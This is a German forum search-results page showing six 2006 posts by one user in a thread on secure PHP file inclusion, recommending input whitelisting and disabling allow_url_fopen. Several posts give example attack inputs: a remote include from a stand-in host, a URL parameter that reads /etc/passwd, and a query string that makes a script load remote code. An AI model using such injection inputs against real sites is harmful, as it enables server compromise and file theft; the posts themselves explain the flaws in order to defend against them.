AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Zurück Delphi-PRAXiS Suchfunktion Ergebnis der Suchanfrage

Ergebnis der Suchanfrage


Datum des Suchindex: Heute, 08:02

Parameter dieser Suchanfrage:

Suche in Thema: [PHP] - Sicheres Includen
Suche alle Beiträge, die von "alcaeus" geschrieben wurden
• Suchmethode: "Suche nach allen Begriffen"
• Nach Datum (firstpost) sortiert
• Zeige Treffer als Beiträge
Zeige 6 von insges. 6 Treffern
Suche benötigte 0.004s

Es liegen Ergebnisse in folgenden Bereichen vor:

  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 16. Aug 2006
    Das ist ja nicht das Problem. Das Problem ist, dass du alles moegliche includen kannst. Nehmen wir mal sowas:
    include('http://badserver.tld/badscript.txt');
    Der Code ladet bei aktivem allow_url_fopen den Inhalt von badscript.txt und fuehrt ihn anschliessend aus. Das ist...suboptimal.

    Ein weiteres Problem:
    mypage.php?include=/etc/passwd
    Bei einem nicht optimal konfigurierten Server (und das...
  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 14. Aug 2006
    Meine eigene Abkuerzung fuer Remote-File-Inclusion. Ich bin zu faul das auszuschreiben :P

    Greetz
    alcaeus
  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 14. Aug 2006
    Genau. Wenn du nicht oft Module hinzufuegst, ist dies gut genug.

    Wichtig ist nur, dass du GPC-Daten nicht ungefiltert verwendest; sei es in SQL-Queries, include-Dateien usw. Gegen RFI hilft aber auch schon, allow_url_fopen zu deaktivieren.

    Greetz
    alcaeus
  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 14. Aug 2006
    Ja, das ist eine Art "Zwischenloesung", die ich persoenlich aber auch nicht verwenden wuerde. So kann ich wenigstens noch festlegen, was der Benutzer machen kann/darf.

    Wenn ich dynamische Webseiten erstelle, und auf sowas zurueckgreifen muss, dann liegen die Module normalerweise in der Datenbank, und werden ueber eine ID oder einen sprechenden Namen aufgerufen (z.B....
  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 14. Aug 2006
    Schoen waers, traurige Wahrheit ist, dass es bei den meisten Hostern an ist, und der 0815-PHPler keinen Plan hat was es ist.


    Noch eine Stufe besser: explizit sagen was erlaubt ist:
    $site = (isset($_GET)) ? $_GET : '';
    $allowed_sites = array('main', 'contact', 'foo', 'bar');
    if (!in_array($site, $allowed_sites))
    {
    $site = 'main';
    }
  • Forum: Programmieren allgemein

    Re: [PHP] - Sicheres Includen

     
      by alcaeus, 14. Aug 2006
    Moin,

    ich gehe mal davon aus, dass register_globals aktiv ist? Dann mach ich z.B. sowas:
    GET deinskript.php?Sec=http://meineseite.de/boesesscript.php?
    Ergebnis: include('http://meineseite.de/boesesscript.php?home.php');

    Mach z.B. immer sowas:
    include './'. $Sec .'home.php';

    Weiters solltest du bei den Leuten anfragen, was genau das Problem zu sein scheint, und wie sie von der Luecke...


URL zu dieser Suchanfrage:

https://www.delphipraxis.net/dp_search.php?do=usersearch&search_username=alcaeus&search_exact_username=1&search_sortby=dateline&search_resulttype=post&search_matchmode=0&searchthreadid=75082
Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 08:16 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz